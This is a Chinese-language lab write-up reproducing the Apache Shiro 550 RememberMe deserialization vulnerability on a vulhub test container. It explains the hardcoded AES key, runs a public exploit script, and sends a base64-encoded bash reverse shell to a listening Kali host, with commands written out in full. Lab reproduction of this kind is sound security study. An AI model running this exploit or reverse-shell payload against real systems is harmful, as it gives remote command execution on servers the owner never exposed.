Shiro 550 漏洞复现

环境搭建

使用vulhub进行搭建,这个vulhub还是很方便的

漏洞原理

漏洞出现在cookie中的RememberMe字段中,说的简单通俗易懂些,当服务端获取到RememberMe后,会进行如下操作

  1. base64解密
  2. AES解密
  3. 反序列化

知道他的工作流程后,我们只需要将自己的payload反向操作就好了

  1. 序列化
  2. AES加密
  3. base64加密

现在最关键的就是AES的密钥,然而恰巧的是Shiro 550中的AES密钥是硬编码写死在代码里的,所以密钥是不会变的,每个人可以通过源代码获取到密钥。

漏洞复现

靶机IP:192.168.214.136

Kali:192.168.214.129

POC:https://github.com/insightglacier/Shiro_exploit

在Kali里执行POC,来验证是否可行

创建一个a.txt文件

root@kali:~/Desktop/Shiro_exploit-master# python3 shiro_exploit.py -t 3 -u http://192.168.214.136 -p "touch a.txt"

image-20200805143729831

等待结束就好

结束后进入容器查看docker exec -it 4f /bin/bash,是存在a.txt,说明次POC可行,可以命令执行。

image-20200805143954963

在Kali上nc监听

nc -lvp 4444

加密反弹shell

加密网站:http://jackson-t.ca/runtime-exec-payloads.html

加密前

bash -i >& /dev/tcp/192.168.214.129/4444 0>&1

加密后

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNC4xMjkvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

image-20200805145353551

使用Shiro_exploit的poc漏洞执行反弹shell

python3 shiro_exploit.py -t 3 -u http://192.168.214.136 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNC4xMjkvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"

连接成功

image-20200805150419178

成功连接到了docker里。

总结

这次只是复现了这个漏洞,并没有对其原理做更多的解释。后续可以在对其进行研究,还有需要复现一下Shiro 721。

Q.E.D.